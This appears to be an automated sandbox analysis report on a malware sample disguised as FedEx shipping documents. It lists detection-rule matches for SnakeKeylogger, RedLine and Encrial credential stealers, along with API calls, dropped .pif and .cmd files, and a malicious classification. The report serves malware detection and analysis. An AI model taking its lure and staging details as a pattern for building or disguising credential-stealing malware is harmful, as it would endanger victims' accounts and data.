Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000001.1674039682.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.3896243951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.3896211622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000001.1589020424.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000001.1451761141.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.3896174260.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, J-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, J-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, J-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, J-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, J-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, J-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, J-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, J-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, .cs	Base64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, .cs	Base64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, .cs	Base64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, .cs	Base64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, .cs	Base64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'

Source: hzwdvhxM.pif, 00000007.00000003.1877236311.000000002E4F9000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1875637119.000000002E4F9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: M.slnt

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/11@3/3

Source: C:\Users\Public\ndpha.pif

Code function: 9_2_00593C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,

9_2_00593C66

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Code function: 0_2_02D579B4 GetDiskFreeSpaceA,

0_2_02D579B4

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,

7_2_004019F0

Source: C:\Users\Public\ndpha.pif

Code function: 9_2_0059205A CoCreateInstance,

9_2_0059205A

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

7_2_004019F0

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

File created: C:\Users\Public\MxhvdwzhF.cmd

Jump to behavior

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Mutant created: NULL
